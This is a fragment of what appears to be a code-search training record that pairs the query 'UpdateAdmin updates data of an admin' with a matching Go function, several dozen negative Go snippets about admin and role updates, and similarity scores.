{\n\tvar (\n\t\tret0 = new([32]byte)\n\t)\n\tout := ret0\n\terr := _DelegationController.contract.Call(opts, out, \"getRoleAdmin\", role)\n\treturn *ret0, err\n}", "func SaveAdmin(admin *model.Admin) error {\n\n\tpassword, err := crypto.AESEncrypt(admin.Password)\n\tif err != nil {\n\t\treturn err\n\t}\n\tadmin.Password = password\n\tif admin.Password == \"\" {\n\t\treturn fmt.Errorf(\"Encrypt failure\")\n\t}\n\treturn db.From(\"admin\").Save(admin)\n\n}", "func (m *MockRoleClient) UpdateRole(modified *v11.Role) (*v11.Role, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"UpdateRole\", modified)\n\tret0, _ := ret[0].(*v11.Role)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (orm *ORM) UpdateAdminPassword(ctx context.Context, adminID string, oldPassword string, newPassword string) (bool, error) {\n\tvar _Admin models.Admin\n\n\terr := orm.DB.DB.First(&_Admin, \"id = ?\", adminID).Error\n\tif errors.Is(err, gorm.ErrRecordNotFound) {\n\t\treturn false, errors.New(\"AdminNotFound\")\n\t}\n\n\tisSame := validatehash.ValidateCipher(oldPassword, _Admin.Password)\n\tif isSame == false {\n\t\treturn false, errors.New(\"OldPasswordIncorrect\")\n\t}\n\n\t_Admin.Password = newPassword\n\torm.DB.DB.Save(&_Admin)\n\treturn true, nil\n\n}", "func (s *ProjectService) UpdateProjectRolePermission(p *UpdateProjectRolePermissionParams) (*UpdateProjectRolePermissionResponse, error) {\n\tresp, err := s.cs.newRequest(\"updateProjectRolePermission\", p.toURLValues())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar r UpdateProjectRolePermissionResponse\n\tif err := json.Unmarshal(resp, &r); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &r, nil\n}", "func (b *azureAuthBackend) pathRoleCreateUpdate(ctx context.Context, req *logical.Request, data *framework.FieldData) (*logical.Response, error) {\n\troleName := data.Get(\"name\").(string)\n\tif roleName == \"\" {\n\t\treturn logical.ErrorResponse(\"missing role name\"), nil\n\t}\n\n\t// Check if the role already exists\n\trole, err := b.role(ctx, req.Storage, roleName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Create a new entry object if this is a CreateOperation\n\tif role == nil {\n\t\tif req.Operation == logical.UpdateOperation {\n\t\t\treturn nil, errors.New(\"role entry not found during update operation\")\n\t\t}\n\t\trole = new(azureRole)\n\t}\n\n\tif policiesRaw, ok := data.GetOk(\"policies\"); ok {\n\t\trole.Policies = policyutil.ParsePolicies(policiesRaw)\n\t}\n\n\tperiodRaw, ok := data.GetOk(\"period\")\n\tif ok {\n\t\trole.Period = time.Duration(periodRaw.(int)) * time.Second\n\t} else if req.Operation == logical.CreateOperation {\n\t\trole.Period = time.Duration(data.Get(\"period\").(int)) * time.Second\n\t}\n\tif role.Period > b.System().MaxLeaseTTL() {\n\t\treturn logical.ErrorResponse(fmt.Sprintf(\"'period' of '%q' is greater than the backend's maximum lease TTL of '%q'\", role.Period.String(), b.System().MaxLeaseTTL().String())), nil\n\t}\n\n\tif tokenNumUsesRaw, ok := data.GetOk(\"num_uses\"); ok {\n\t\trole.NumUses = tokenNumUsesRaw.(int)\n\t} else if req.Operation == logical.CreateOperation {\n\t\trole.NumUses = data.Get(\"num_uses\").(int)\n\t}\n\tif role.NumUses < 0 {\n\t\treturn logical.ErrorResponse(\"num_uses cannot be negative\"), nil\n\t}\n\n\tif tokenTTLRaw, ok := data.GetOk(\"ttl\"); ok {\n\t\trole.TTL = time.Duration(tokenTTLRaw.(int)) * time.Second\n\t} else if req.Operation == logical.CreateOperation {\n\t\trole.TTL = time.Duration(data.Get(\"ttl\").(int)) * time.Second\n\t}\n\n\tif tokenMaxTTLRaw, ok := data.GetOk(\"max_ttl\"); ok {\n\t\trole.MaxTTL = time.Duration(tokenMaxTTLRaw.(int)) * time.Second\n\t} else if req.Operation == logical.CreateOperation {\n\t\trole.MaxTTL = time.Duration(data.Get(\"max_ttl\").(int)) * time.Second\n\t}\n\n\tif boundServicePrincipalIDs, ok := data.GetOk(\"bound_service_principal_ids\"); ok {\n\t\trole.BoundServicePrincipalIDs = boundServicePrincipalIDs.([]string)\n\t}\n\n\tif boundGroupIDs, ok := data.GetOk(\"bound_group_ids\"); ok {\n\t\trole.BoundGroupIDs = boundGroupIDs.([]string)\n\t}\n\n\tif boundSubscriptionsIDs, ok := data.GetOk(\"bound_subscription_ids\"); ok {\n\t\trole.BoundSubscriptionsIDs = boundSubscriptionsIDs.([]string)\n\t}\n\n\tif boundResourceGroups, ok := data.GetOk(\"bound_resource_groups\"); ok {\n\t\trole.BoundResourceGroups = boundResourceGroups.([]string)\n\t}\n\n\tif boundLocations, ok := data.GetOk(\"bound_locations\"); ok {\n\t\trole.BoundLocations = boundLocations.([]string)\n\t}\n\n\tif len(role.BoundServicePrincipalIDs) == 0 &&\n\t\tlen(role.BoundGroupIDs) == 0 &&\n\t\tlen(role.BoundSubscriptionsIDs) == 0 &&\n\t\tlen(role.BoundResourceGroups) == 0 &&\n\t\tlen(role.BoundLocations) == 0 {\n\t\treturn logical.ErrorResponse(\"must have at least one bound constraint when creating/updating a role\"), nil\n\t}\n\n\t// Check that the TTL value provided is less than the MaxTTL.\n\t// Sanitizing the TTL and MaxTTL is not required now and can be performed\n\t// at credential issue time.\n\tif role.MaxTTL > 0 && role.TTL > role.MaxTTL {\n\t\treturn logical.ErrorResponse(\"ttl should not be greater than max_ttl\"), nil\n\t}\n\n\tvar resp *logical.Response\n\tif role.MaxTTL > b.System().MaxLeaseTTL() {\n\t\tresp = &logical.Response{}\n\t\tresp.AddWarning(\"max_ttl is greater than the system or backend mount's maximum TTL value; issued tokens' max TTL value will be truncated\")\n\t}\n\n\t// Store the entry.\n\tentry, err := logical.StorageEntryJSON(\"role/\"+strings.ToLower(roleName), role)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif entry == nil {\n\t\treturn nil, fmt.Errorf(\"failed to create storage entry for role %s\", roleName)\n\t}\n\tif err = req.Storage.Put(ctx, entry); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn resp, nil\n}", "func (c *VaultController) reconcileMySQLRole(rClient database.DatabaseRoleInterface, role *api.MySQLRole) error {\n\t// create role\n\terr := rClient.CreateRole()\n\tif err != nil {\n\t\t_, err2 := patchutil.UpdateMySQLRoleStatus(\n\t\t\tcontext.TODO(),\n\t\t\tc.extClient.EngineV1alpha1(),\n\t\t\trole.ObjectMeta,\n\t\t\tfunc(status *api.MySQLRoleStatus) *api.MySQLRoleStatus {\n\t\t\t\tstatus.Conditions = kmapi.SetCondition(status.Conditions, kmapi.Condition{\n\t\t\t\t\tType: kmapi.ConditionFailed,\n\t\t\t\t\tStatus: core.ConditionTrue,\n\t\t\t\t\tReason: \"FailedToCreateRole\",\n\t\t\t\t\tMessage: err.Error(),\n\t\t\t\t})\n\t\t\t\treturn status\n\t\t\t}, metav1.UpdateOptions{},\n\t\t)\n\t\treturn utilerrors.NewAggregate([]error{err2, errors.Wrap(err, \"failed to create role\")})\n\t}\n\n\t_, err = patchutil.UpdateMySQLRoleStatus(\n\t\tcontext.TODO(),\n\t\tc.extClient.EngineV1alpha1(),\n\t\trole.ObjectMeta,\n\t\tfunc(status *api.MySQLRoleStatus) *api.MySQLRoleStatus {\n\t\t\tstatus.Phase = MySQLRolePhaseSuccess\n\t\t\tstatus.ObservedGeneration = role.Generation\n\t\t\tstatus.Conditions = kmapi.RemoveCondition(status.Conditions, kmapi.ConditionFailed)\n\t\t\tstatus.Conditions = kmapi.SetCondition(status.Conditions, kmapi.Condition{\n\t\t\t\tType: kmapi.ConditionAvailable,\n\t\t\t\tStatus: core.ConditionTrue,\n\t\t\t\tReason: \"Provisioned\",\n\t\t\t\tMessage: \"role is ready to use\",\n\t\t\t})\n\t\t\treturn status\n\t\t}, metav1.UpdateOptions{},\n\t)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tglog.Infof(\"Successfully processed MySQLRole: %s/%s\", role.Namespace, role.Name)\n\treturn nil\n}", "func (r *UserRolesService) Update(profileId int64, userrole *UserRole) *UserRolesUpdateCall {\n\tc := &UserRolesUpdateCall{s: r.s, urlParams_: make(gensupport.URLParams)}\n\tc.profileId = profileId\n\tc.userrole = userrole\n\treturn c\n}", "func (user *User) SetAsAdmin() {\n\tuser.Role = UserRoleAdmin\n}", "func (s *projService) UpdateProjectRoleType(ctx context.Context, req *pb.UpdateProjectRoleTypeRequest) (*pb.UpdateProjectRoleTypeResponse, error) {\n\tresp := &pb.UpdateProjectRoleTypeResponse{}\n\tvar err error\n\n\tsqlstring := `UPDATE tb_ProjectRoleType SET dtmModified = NOW(), intVersion = ?, chvRoleName = ?, chvDescription = ?\n\tWHERE intProjectRoleId = ? AND inbMserviceId = ? AND intVersion = ? AND bitIsDeleted = 0`\n\n\tstmt, err := s.db.Prepare(sqlstring)\n\tif err != nil {\n\t\tlevel.Error(s.logger).Log(\"what\", \"Prepare\", \"error\", err)\n\t\tresp.ErrorCode = 500\n\t\tresp.ErrorMessage = \"db.Prepare failed\"\n\t\treturn resp, nil\n\t}\n\n\tdefer stmt.Close()\n\n\tres, err := stmt.Exec(req.GetVersion()+1, req.GetRoleName(), req.GetDescription(), req.GetProjectRoleId(),\n\t\treq.GetMserviceId(), req.GetVersion())\n\n\tif err == nil {\n\t\trowsAffected, _ := res.RowsAffected()\n\t\tif rowsAffected == 1 {\n\t\t\tresp.Version = req.GetVersion() + 1\n\t\t} else {\n\t\t\tresp.ErrorCode = 404\n\t\t\tresp.ErrorMessage = \"not found\"\n\t\t}\n\t} else {\n\t\tresp.ErrorCode = 501\n\t\tresp.ErrorMessage = err.Error()\n\t\tlevel.Error(s.logger).Log(\"what\", \"Exec\", \"error\", err)\n\t\terr = nil\n\t}\n\n\treturn resp, err\n}", "func (aaa *RolesService) GetRoleAdminStatus(input *roles.GetRoleAdminStatusParams) (*iamclientmodels.ModelRoleAdminStatusResponse, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tok, badRequest, unauthorized, forbidden, notFound, err := aaa.Client.Roles.GetRoleAdminStatus(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif notFound != nil {\n\t\treturn nil, notFound\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ok.GetPayload(), nil\n}", "func (_TellorMesosphere *TellorMesosphereFilterer) WatchRoleAdminChanged(opts *bind.WatchOpts, sink chan<- *TellorMesosphereRoleAdminChanged, role [][32]byte, previousAdminRole [][32]byte, newAdminRole [][32]byte) (event.Subscription, error) {\n\n\tvar roleRule []interface{}\n\tfor _, roleItem := range role {\n\t\troleRule = append(roleRule, roleItem)\n\t}\n\tvar previousAdminRoleRule []interface{}\n\tfor _, previousAdminRoleItem := range previousAdminRole {\n\t\tpreviousAdminRoleRule = append(previousAdminRoleRule, previousAdminRoleItem)\n\t}\n\tvar newAdminRoleRule []interface{}\n\tfor _, newAdminRoleItem := range newAdminRole {\n\t\tnewAdminRoleRule = append(newAdminRoleRule, newAdminRoleItem)\n\t}\n\n\tlogs, sub, err := _TellorMesosphere.contract.WatchLogs(opts, \"RoleAdminChanged\", roleRule, previousAdminRoleRule, newAdminRoleRule)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn event.NewSubscription(func(quit <-chan struct{}) error {\n\t\tdefer sub.Unsubscribe()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase log := <-logs:\n\t\t\t\t// New log arrived, parse the event and forward to the user\n\t\t\t\tevent := new(TellorMesosphereRoleAdminChanged)\n\t\t\t\tif err := _TellorMesosphere.contract.UnpackLog(event, \"RoleAdminChanged\", log); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tevent.Raw = log\n\n\t\t\t\tselect {\n\t\t\t\tcase sink <- event:\n\t\t\t\tcase err := <-sub.Err():\n\t\t\t\t\treturn err\n\t\t\t\tcase <-quit:\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\tcase err := <-sub.Err():\n\t\t\t\treturn err\n\t\t\tcase <-quit:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}), nil\n}", "func (m *Manager) UpdateMembership(globalid string, username string, oldrole string, newrole string) error {\n\tqry := bson.M{\"globalid\": globalid}\n\tpull := bson.M{\n\t\t\"$pull\": bson.M{oldrole: username},\n\t}\n\tpush := bson.M{\n\t\t\"$addToSet\": bson.M{newrole: username},\n\t}\n\terr := m.collection.Update(qry, pull)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn m.collection.Update(qry, push)\n}", "func (i *Impersonator) checkAndUpdateRole(rules []rbacv1.PolicyRule) (*rbacv1.ClusterRole, error) {\n\tname := ImpersonationPrefix + i.user.GetUID()\n\tvar role *rbacv1.ClusterRole\n\terr := retry.RetryOnConflict(retry.DefaultRetry, func() error {\n\t\tvar err error\n\t\trole, err = i.clusterContext.RBAC.ClusterRoles(\"\").Controller().Lister().Get(\"\", name)\n\t\tif apierrors.IsNotFound(err) {\n\t\t\treturn nil\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !reflect.DeepEqual(role.Rules, rules) {\n\t\t\trole.Rules = rules\n\t\t\trole, err = i.clusterContext.RBAC.ClusterRoles(\"\").Update(role)\n\t\t\treturn err\n\t\t}\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn role, nil\n}", "func (strategy) ValidateUpdate(ctx context.Context, obj, old runtime.Object) field.ErrorList {\n\tnewObj := obj.(*rbac.Role)\n\terrorList := validation.ValidateRole(newObj)\n\treturn append(errorList, validation.ValidateRoleUpdate(newObj, old.(*rbac.Role))...)\n}" ]
[ "0.75154316", "0.719224", "0.7145205", "0.7117579", "0.69392425", "0.6890341", "0.6837208", "0.6815211", "0.67718214", "0.6735075", "0.6655265", "0.66327924", "0.6616167", "0.66020566", "0.6572484", "0.6556261", "0.6539695", "0.649078", "0.6460554", "0.64441735", "0.6400338", "0.6384954", "0.63679284", "0.63617283", "0.6344365", "0.63045996", "0.62083524", "0.61364526", "0.60812145", "0.6057436", "0.60437745", "0.5988364", "0.59871215", "0.5976981", "0.59573734", "0.59557533", "0.59512085", "0.5932643", "0.5931133", "0.5918562", "0.591611", "0.5910244", "0.5900621", "0.58966553", "0.5885235", "0.5884711", "0.58670187", "0.58659464", "0.5839014", "0.5819295", "0.57830584", "0.5748906", "0.5745791", "0.5707523", "0.5687581", "0.56840026", "0.5677717", "0.56656295", "0.56635696", "0.56589264", "0.5640189", "0.5591141", "0.5583818", "0.55703664", "0.5566521", "0.5562906", "0.55586857", "0.55506873", "0.5549509", "0.55415595", "0.5510588", "0.5505867", "0.55036813", "0.5502039", "0.54925394", "0.54757494", "0.54722077", "0.5467885", "0.5466293", "0.5458107", "0.54513144", "0.54416955", "0.5429317", "0.5408736", "0.5406538", "0.5401417", "0.5394746", "0.5384686", "0.5366677", "0.536205", "0.53604156", "0.53511995", "0.5334379", "0.5332529", "0.53263617", "0.5325027", "0.53197664", "0.5313249", "0.5312221", "0.5302615" ]
0.75749993
0
UpdateAdmin updates data of an admin
func (orm *ORM) UpdateAdmin(ctx context.Context, adminID string, fullname *string, email *string, phone *string) (bool, error) { var _Admin models.Admin err := orm.DB.DB.First(&_Admin, "id = ?", adminID).Error if errors.Is(err, gorm.ErrRecordNotFound) { return false, errors.New("AdminNotFound") } if fullname != nil { _Admin.FullName = *fullname } if email != nil { _Admin.Email = *email } if phone != nil { _Admin.Phone = phone } orm.DB.DB.Save(&_Admin) return true, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func UpdateAdmin(w http.ResponseWriter, r *http.Request) {\n\tvar body UpdateAdminRequest\n\tif err := read.JSON(r.Body, &body); err != nil {\n\t\trender.Error(w, admin.WrapError(admin.ErrorBadRequestType, err, \"error reading request body\"))\n\t\treturn\n\t}\n\n\tif err := body.Validate(); err != nil {\n\t\trender.Error(w, err)\n\t\treturn\n\t}\n\n\tid := chi.URLParam(r, \"id\")\n\tauth := mustAuthority(r.Context())\n\tadm, err := auth.UpdateAdmin(r.Context(), id, &linkedca.Admin{Type: body.Type})\n\tif err != nil {\n\t\trender.Error(w, admin.WrapErrorISE(err, \"error updating admin %s\", id))\n\t\treturn\n\t}\n\n\trender.ProtoJSON(w, adm)\n}", "func (m *manager) AdminUpdate(ctx context.Context) error {\n\ttoRun := m.adminUpdate()\n\treturn m.runSteps(ctx, toRun, \"adminUpdate\")\n}", "func AdminEdit(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminEdit, w, data)\n}", "func AdminEdit(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminEdit, w, data)\n}", "func saveAdmin(e echo.Context) error {\n\tdb := e.Get(\"database\").(*mgo.Database)\n\tif db == nil {\n\t\treturn fmt.Errorf(\"Bad database session\")\n\t}\n\n\ta := models.Admin{}\n\terr := e.Bind(&a)\n\tif err != nil {\n\t\treturn err\n\t}\n\ta.ServerUpdateDateTime = time.Now().UTC()\n\n\texisting := models.Admin{}\n\terr = db.C(\"Admins\").Find(bson.M{\"adminUuid\": a.AdminUUID}).One(&existing)\n\n\tif err == nil {\n\t\tif existing.ServerUpdateDateTime.After(a.LocalUpdateDateTime) {\n\t\t\t// Server version is more recent\n\t\t\treturn e.JSON(http.StatusConflict, existing)\n\t\t}\n\n\t\ta.AdminID = existing.AdminID\n\t\t_, err = db.C(\"Admins\").UpsertId(existing.AdminID, &a)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tif a.AdminID == \"\" {\n\t\t\ta.AdminID = bson.NewObjectId().String()\n\t\t}\n\n\t\terr = db.C(\"Admins\").Insert(&a)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn e.JSON(http.StatusOK, a)\n}", "func (s *rpcServer) UpdateAdmin(ctx context.Context, req *api.UpdateAdminRequest) (*api.UpdateAdminResponse, error) {\n\tlogger := log.GetLogger(ctx)\n\tlogger.Debugf(\"%+v\", req)\n\tadmin, err := admin.ByID(req.AdminId)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// Update all the fields\n\tadmin.Name = req.Admin.Name\n\tadmin.Email = req.Admin.Email\n\tadmin.ACL = req.Admin.ACL\n\tif err := admin.Save(); err != nil {\n\t\treturn nil, errors.Wrap(err, \"error while saving admin to db\")\n\t}\n\treturn &api.UpdateAdminResponse{\n\t\tAdmin: &api.Admin{\n\t\t\tId: admin.ID,\n\t\t\tName: admin.Name,\n\t\t\tEmail: admin.Email,\n\t\t\tACL: admin.ACL,\n\t\t},\n\t}, nil\n}", "func UpdateAdminByID(i AdminEditForm, idToUpdate string) (*mongo.UpdateResult, error) {\n\toid, _ := primitive.ObjectIDFromHex(idToUpdate)\n\treturn adminCollection.UpdateOne(context.TODO(), bson.M{\"_id\": oid}, bson.D{\n\t\tprimitive.E{Key: \"$set\", Value: bson.D{\n\t\t\tprimitive.E{Key: \"fras_username\", Value: i.FrasUsername},\n\t\t}},\n\t\tprimitive.E{Key: \"$currentDate\", Value: bson.D{\n\t\t\tprimitive.E{Key: \"modified_at\", Value: true},\n\t\t}},\n\t})\n}", "func (au *AdminUpdate) Exec(ctx context.Context) error {\n\t_, err := au.Save(ctx)\n\treturn err\n}", "func (ad *Admin) Update() error {\n\tif ad.dbCollection == nil {\n\t\treturn errors.New(\"Uninitialized Object Admin\")\n\t}\n\tquery := bson.M{\"uid\": ad.UID}\n\tchange := bson.M{\"$set\": ad}\n\treturn ad.dbCollection.Update(query, change)\n}", "func (*AdminInfoService) UpdateInfo(id int, pwd string) error {\n\tadm := new(entities.AdminInfo)\n\tadm.AdminPwd = pwd\n\n\t_, err := entities.MasterEngine.Id(id).Update(adm)\n\n\treturn err\n}", "func (bs *DefaultSecurity) UpdateAdmins(login string, delete bool) error {\n\tfor i, name := range bs.Admins.Names {\n\t\tif name == login {\n\t\t\tif delete {\n\t\t\t\tbs.Admins.Names = append(bs.Admins.Names[:i], bs.Admins.Names[i+1:]...)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\treturn errors.New(\"Login already exists\")\n\t\t}\n\t}\n\tbs.Admins.Names = append(bs.Admins.Names, login)\n\treturn nil\n}", "func (a *Admin) Update() (*mongo.UpdateResult, error) {\n\ta.ModifiedAt = variable.DateTimeNowPtr()\n\n\tupdate := bson.M{\"$set\": *a}\n\treturn a.Collection().UpdateOne(context.Background(), bson.M{\"_id\": a.ID}, update)\n}", "func AccepAdmin(c *gin.Context) {\r\n\tvar accountemp []model.UserTemporary\r\n\r\n\tif err := c.Bind(&accountemp); err != nil {\r\n\t\tutils.WrapAPIError(c, err.Error(), http.StatusBadRequest)\r\n\t\treturn\r\n\t}\r\n\r\n\t//fmt.Println(account)\r\n\r\n\t//q := model.DB.Save(&account)\r\n\r\n\t//approve akun\r\n\tq := model.DB.Delete(&accountemp)\r\n\trow := q.RowsAffected\r\n\r\n\tutils.WrapAPIData(c, map[string]interface{}{\r\n\t\t\"Data\": accountemp,\r\n\t\t\"Row affected\": row,\r\n\t}, http.StatusOK, \"success\")\r\n\r\n}", "func (_obj *Apichannels) Channels_editAdmin(params *TLchannels_editAdmin, _opt ...map[string]string) (ret Updates, err error) {\n\n\tvar length int32\n\tvar have bool\n\tvar ty byte\n\t_os := codec.NewBuffer()\n\terr = params.WriteBlock(_os, 1)\n\tif err != nil {\n\t\treturn ret, err\n\t}\n\n\tvar _status map[string]string\n\tvar _context map[string]string\n\tif len(_opt) == 1 {\n\t\t_context = _opt[0]\n\t} else if len(_opt) == 2 {\n\t\t_context = _opt[0]\n\t\t_status = _opt[1]\n\t}\n\t_resp := new(requestf.ResponsePacket)\n\ttarsCtx := context.Background()\n\n\terr = _obj.s.Tars_invoke(tarsCtx, 0, \"channels_editAdmin\", _os.ToBytes(), _status, _context, _resp)\n\tif err != nil {\n\t\treturn ret, err\n\t}\n\n\t_is := codec.NewReader(tools.Int8ToByte(_resp.SBuffer))\n\terr = ret.ReadBlock(_is, 0, true)\n\tif err != nil {\n\t\treturn ret, err\n\t}\n\n\tif len(_opt) == 1 {\n\t\tfor k := range _context {\n\t\t\tdelete(_context, k)\n\t\t}\n\t\tfor k, v := range _resp.Context {\n\t\t\t_context[k] = v\n\t\t}\n\t} else if len(_opt) == 2 {\n\t\tfor k := range _context {\n\t\t\tdelete(_context, k)\n\t\t}\n\t\tfor k, v := range _resp.Context {\n\t\t\t_context[k] = v\n\t\t}\n\t\tfor k := range _status {\n\t\t\tdelete(_status, k)\n\t\t}\n\t\tfor k, v := range _resp.Status {\n\t\t\t_status[k] = v\n\t\t}\n\n\t}\n\t_ = length\n\t_ = have\n\t_ = ty\n\treturn ret, nil\n}", "func (au *AdministratorUpdate) Exec(ctx context.Context) error {\n\t_, err := au.Save(ctx)\n\treturn err\n}", "func (d *webData) modifyAdminWeb(w http.ResponseWriter, r *http.Request) {\n\tip := r.RemoteAddr\n\tadminID := 0\n\t//query the userDB for all users and put the returning slice with result in p\n\tu := storage.QuerySingleUserInfo(d.PDB, adminID)\n\n\t//Execute the web for modify users, range over p to make the select user drop down menu\n\terr := d.tpl.ExecuteTemplate(w, \"modifyUserCompletePage\", u)\n\tif err != nil {\n\t\tfmt.Fprint(w, \"Error: modifyAdminWeb: template execution error = \", err)\n\t}\n\n\t//Write out all the info of the selected user to the web\n\n\terr = d.tpl.ExecuteTemplate(w, \"modifyUser\", u) //bruk bare en spesifik slice av struct og send til html template\n\tif err != nil {\n\t\tlog.Println(ip, \"modifyAdminWeb: error = \", err)\n\t}\n\n\tr.ParseForm()\n\n\t//create a variable based on user to hold the values parsed from the modify web\n\tuForm := storage.User{}\n\t//get all the values like name etc. from the form, and put them in u\n\tgetFormValuesUserInfo(&uForm, r)\n\tchanged := false\n\tchanged, u = checkUserFormChanged(uForm, u)\n\n\t//Check what values that are changed\n\n\t//if any of the values was changed....update information into database\n\tif changed {\n\t\tstorage.UpdateUser(d.PDB, u)\n\n\t\t//Execute the redirect to modifyAdmin to refresh page\n\t\terr := d.tpl.ExecuteTemplate(w, \"redirectTomodifyAdmin\", u)\n\t\tif err != nil {\n\t\t\tfmt.Fprint(w, \"Error: modifyAdminWeb: template execution error = \", err)\n\t\t}\n\t}\n}", "func (h *Handler) serveUpdateClusterAdmin(w http.ResponseWriter, r *http.Request) {}", "func (dau *DdgAdminUser) Update(ctx context.Context, key ...interface{}) error {\n\tvar err error\n\tvar dbConn *sql.DB\n\n\t// if deleted, bail\n\tif dau._deleted {\n\t\treturn errors.New(\"update failed: marked for deletion\")\n\t}\n\n\ttx, err := components.M.GetConnFromCtx(ctx)\n\tif err != nil {\n\t\tdbConn, err = components.M.GetMasterConn()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\ttableName, err := GetDdgAdminUserTableName(key...)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// sql query\n\tsqlstr := `UPDATE ` + tableName + ` SET ` +\n\t\t`name = ?, account = ?, password = ?, permission_ids = ?, status = ?` +\n\t\t` WHERE id = ?`\n\n\t// run query\n\tutils.GetTraceLog(ctx).Debug(\"DB\", zap.String(\"SQL\", fmt.Sprint(sqlstr, dau.Name, dau.Account, dau.Password, dau.PermissionIds, dau.Status, dau.ID)))\n\tif tx != nil {\n\t\t_, err = tx.Exec(sqlstr, dau.Name, dau.Account, dau.Password, dau.PermissionIds, dau.Status, dau.ID)\n\t} else {\n\t\t_, err = dbConn.Exec(sqlstr, dau.Name, dau.Account, dau.Password, dau.PermissionIds, dau.Status, dau.ID)\n\t}\n\treturn err\n}", "func UpdateAdminUsersById(m *AdminUsers) (err error) {\n\tv := AdminUsers{Id: m.Id}\n\tvar num int64\n\t_, err = common.Engine.Id(v.Id).Get(&v)\n\tif err == nil {\n\t\tif num, err = common.Engine.ID(m.Id).Update(&m); err == nil {\n\t\t\tfmt.Println(\"Number of records updated in database:\", num)\n\t\t}\n\t}\n\treturn\n}", "func UserUpdate(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {\n\n}", "func (admin *Admin) UpdateAdmin(db *gorm.DB, id string) (*Admin, error) {\n\n\terr := admin.BeforeSave()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\terr = db.Debug().Model(Admin{}).Updates(&admin).Error\n\tif err != nil {\n\t\treturn &Admin{}, err\n\t}\n\n\treturn admin.FindAdminByID(db, id)\n}", "func (this *BaseController) toggleAdmin(ctx *gin.Context) {\n\tsid := ctx.Param(\"id\")\n\tid, _ := strconv.ParseUint(sid, 10, 64)\n\n\tisadmin := ctx.PostForm(\"isadmin\")\n\tbadmin, err := strconv.ParseBool(isadmin)\n\tif err != nil {\n\t\tctx.JSON(200, gin.H{\"code\": -1, \"msg\": \"是否管理员请传入1或0\"})\n\t\treturn\n\t}\n\n\tu := this.getUserInfo(ctx)\n\tif (uint64)(u.ID) == id {\n\t\tctx.JSON(200, gin.H{\"code\": -1, \"msg\": \"账户不能设置自己的权限!\"})\n\t\treturn\n\t}\n\n\tvar uoth model.User\n\tthis.Context.DB.Where(\"id=?\", sid).First(&uoth)\n\tif uoth.ID > 0 {\n\t\tuoth.IsAdmin = badmin\n\t\tif err := this.Context.DB.Save(&uoth); err.Error != nil {\n\t\t\tctx.JSON(200, gin.H{\"code\": -1, \"msg\": \"出现错误:\" + err.Error.Error()})\n\t\t\treturn\n\t\t} else {\n\t\t\tctx.JSON(200, gin.H{\"code\": -1, \"msg\": \"操作成功\"})\n\t\t\treturn\n\t\t}\n\t} else { // User Not Found\n\t\tctx.JSON(200, gin.H{\"code\": -1, \"msg\": \"未找到指定ID的用户,请检查传入数据是否正确\"})\n\t\treturn\n\t}\n}", "func (adminrepo *AdminRepo) SaveAdmin(admin *entity.Admin) (*entity.Admin , error) {\n\toid , er := primitive.ObjectIDFromHex(admin.ID)\n\tif er != nil {\n\t\treturn nil , er\n\t}\n\t_, er = adminrepo.DB.Collection(entity.ADMIN).UpdateOne(context.TODO(), bson.D{{\"_id\", oid}},\n\t\tbson.D{\n\t\t\t{\"$set\", bson.D{\n\t\t\t {\"email\", admin.Email}, \n\t\t\t {\"password\", admin.Password}, \n\t\t\t {\"username\" , admin.Username}}},\n\t\t})\n\tif er != nil {\n\t\treturn admin, er\n\t}\n\treturn admin, nil\n}", "func (h *Handlers) ActionUpdate(w http.ResponseWriter, r *http.Request) {\n\tpresAlias := r.FormValue(\"id\")\n\tnewVal := r.FormValue(\"newvalue\")\n\toldVal := r.FormValue(\"oldvalue\")\n\tcolName := r.FormValue(\"colname\")\n\tsecret := r.FormValue(\"secret\")\n\tLog.Println(\"formparams:(presAlias, new, old, field)\", presAlias, newVal, oldVal, colName)\n\trespStr := h.storage.UpdateAlias(presAlias, oldVal, newVal, colName, secret)\n\tfmt.Fprint(w, respStr)\n}", "func (app *Application) Admin(w http.ResponseWriter, r *http.Request) {\n\tdata := struct {\n\t\tTime int64\n\t}{\n\t\tTime: time.Now().Unix(),\n\t}\n\n\tt, err := template.ParseFiles(\"views/index.tpl\")\n\n\tif err != nil {\n\t\tlog.Println(\"Template.Parse:\", err)\n\t\thttp.Error(w, \"Internal Server Error 0x0178\", http.StatusInternalServerError)\n\t}\n\n\tif err := t.Execute(w, data); err != nil {\n\t\tlog.Println(\"Template.Execute:\", err)\n\t\thttp.Error(w, \"Internal Server Error 